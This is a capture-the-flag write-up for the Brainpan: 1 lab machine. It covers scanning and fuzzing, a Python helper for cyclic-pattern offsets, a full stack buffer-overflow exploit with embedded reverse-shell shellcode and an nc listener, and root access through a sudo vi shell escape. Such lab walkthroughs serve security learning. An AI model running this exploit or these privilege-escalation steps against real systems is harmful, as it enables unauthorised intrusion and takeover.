Wednesday, December 5, 2018

Brainpan: 1 Write-up

Target: Brainpan: 1

Start with an nmap scan of all ports (-p-).







Then rescan the open ports with -sV and -A for service versions and default scripts.


Open port 10000 in a browser: robots.txt has nothing and the page source has nothing, so run a directory brute-force.




Download the file the brute-force turns up.


Open the file in Immunity Debugger and run it.


Fuzz the port with a cyclic pattern: the program crashes and EIP is overwritten with 0x35724134 (four bytes of the pattern).


fuzz_payload:
import sys, socket

host = sys.argv[1]
port = int(sys.argv[2])

# Paste the cyclic pattern here, generated with:
# ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000
junk = ""

con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((host, port))
con.recv(1024)                  # read the banner/prompt first
con.send(junk.encode('utf-8'))  # the pattern is plain ASCII, so utf-8 is byte-for-byte

con.close()

pattern_offset maps 0x35724134 to offset 524 in the pattern, so 524 bytes of padding land exactly before the saved return address.
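As an added example (my own code, not part of the original write-up), here is a pure-Python equivalent of the pattern_create / pattern_offset step used above, so the value seen in EIP can be turned into the exact padding length without Metasploit installed. The function names cyclic_pattern, pattern_offset and send_fuzz are mine; the EIP value 0x35724134 is the one from the crash above.

```python
import itertools
import socket
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def cyclic_pattern(length):
    """First `length` characters of the Metasploit-style pattern "Aa0Aa1Aa2...".

    Each triplet is upper+lower+digit, so every 4-byte window is unique for
    the first 20280 bytes: that is what lets a crash value map back to one offset.
    """
    chunks, size = [], 0
    for u, l, d in itertools.product(UPPER, LOWER, DIGITS):
        chunks.append(u + l + d)
        size += 3
        if size >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, eip_value):
    """Offset in `pattern` of the 4 bytes that ended up in EIP.

    The debugger shows EIP as a number (0x35724134). x86 is little-endian, so
    the bytes that sat on the stack were 34 41 72 35, i.e. the text "4Ar5".
    """
    needle = struct.pack("<I", eip_value)  # back to stack byte order
    idx = pattern.encode("ascii").find(needle)
    if idx < 0:
        raise ValueError("0x%08x is not a pattern fragment: wrong pattern length, "
                         "or EIP was not overwritten by the pattern" % eip_value)
    return idx


def send_fuzz(host, port, data, timeout=3):
    """Send one fuzz buffer the way the write-up's script does; returns the banner."""
    with socket.create_connection((host, port), timeout=timeout) as con:
        banner = con.recv(1024)          # read the prompt before sending
        con.sendall(data.encode("ascii"))
    return banner


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:             # fuzz mode: <host> <port>
        send_fuzz(sys.argv[1], int(sys.argv[2]), cyclic_pattern(1000))
    else:                              # offset mode: <eip_hex>, e.g. 35724134
        print(pattern_offset(cyclic_pattern(1000), int(sys.argv[1], 16)))
```

Run it once with host and port to send the 1000-byte pattern, read EIP from the debugger, then run it again with that hex value to get the offset (524 here). If the value is not found, EIP was not overwritten by the pattern itself (too short a pattern, or the crash came from somewhere else), which is worth knowing before trusting any offset.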


Use objdump to find a jmp esp (opcode ff e4) or call eax in the binary to land in the shellcode; the address is 0x311712F3, which written little-endian is \xF3\x12\x17\x31. It contains no \x00, so it is safe to use as the return address.

Then generate the shellcode with \x00 excluded as a bad character (a NUL would terminate the string copy and truncate the payload).


Start an nc listener on port 5555 (nc -nlvp 5555) to catch the reverse shell.

Now send the real exploit (no longer a fuzz run):
import sys, socket

host = sys.argv[1]
port = int(sys.argv[2])

eip = b"\xf3\x12\x17\x31"  # jmp esp at 0x311712f3, little-endian; contains no \x00

nops = b"\x90" * 10  # short NOP sled so a jump landing a few bytes off still works

# Reverse-shell shellcode (generated with \x00 excluded), calling back to port 5555
buf =  b""
buf += b"\xdb\xc8\xd9\x74\x24\xf4\x5d\xb8\x61\x9a\x57\x74\x29"
buf += b"\xc9\xb1\x12\x31\x45\x17\x83\xed\xfc\x03\x24\x89\xb5"
buf += b"\x81\x97\x76\xce\x89\x84\xcb\x62\x24\x28\x45\x65\x08"
buf += b"\x4a\x98\xe6\xfa\xcb\x92\xd8\x31\x6b\x9b\x5f\x33\x03"
buf += b"\xdc\x08\xc2\xb5\xb4\x4a\xc5\x2c\xf6\xc2\x24\xfe\x9e"
buf += b"\x84\xf7\xad\xed\x26\x71\xb0\xdf\xa9\xd3\x5a\x8e\x86"
buf += b"\xa0\xf2\x26\xf6\x69\x60\xde\x81\x95\x36\x73\x1b\xb8"
buf += b"\x06\x78\xd6\xbb"

payload = (b"a" * 524) + eip + nops + buf  # 524 bytes of padding reach the saved EIP

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host, port))

print(s.recv(1024))  # banner/prompt

s.send(payload)

print(s.recv(1024))  # whatever comes back before control transfers to the shellcode

s.close()

The reverse shell connects back; upgrade it to a full TTY with python -c 'import pty;pty.spawn("/bin/bash")'.






Look in /etc/passwd for accounts that have a home directory and /bin/bash as their shell.


sudo -l shows a suspicious file the current user may run as root.


Running that file via sudo shows that, with the manual option, it can run arbitrary files as root.


Run vi through it and use the shell escape (!bash) to drop into a root shell.
